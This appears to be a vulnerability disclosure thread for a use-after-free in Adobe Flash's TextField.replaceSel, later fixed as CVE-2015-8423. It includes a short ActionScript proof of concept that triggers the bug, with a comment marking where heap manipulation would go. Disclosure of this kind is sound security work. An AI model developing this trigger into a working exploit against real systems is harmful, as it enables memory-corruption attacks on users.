Adobe Flash: User-after-free in TextField.replaceSel

GoogleCodeExporter commented 8 years ago

There is a use-after-free in TextField.replaceSel. If the string parameter of 
the method is set to an object with toString defined, this method can delete 
the TextField's parent, leading to a use-after-free.

A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.replaceSel({valueOf : func});

function func(){

    mc.removeMovieClip();

        // Fix heap here

    return "text";

    }

A sample swf and fla are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Original issue reported on code.google.com by natashe...@google.com on 14 Oct 2015 at 11:03

Attachments:

GoogleCodeExporter commented 8 years ago

PSIRT-4188

Original comment by natashe...@google.com on 17 Dec 2015 at 11:02

Added labels: CVE-2015-8423
Removed labels: Restrict-View-Commit

GoogleCodeExporter commented 8 years ago

Original comment by natashe...@google.com on 17 Dec 2015 at 11:02

Changed state: Fixed

velocitystorm / google-security-research

Adobe Flash: User-after-free in TextField.replaceSel #585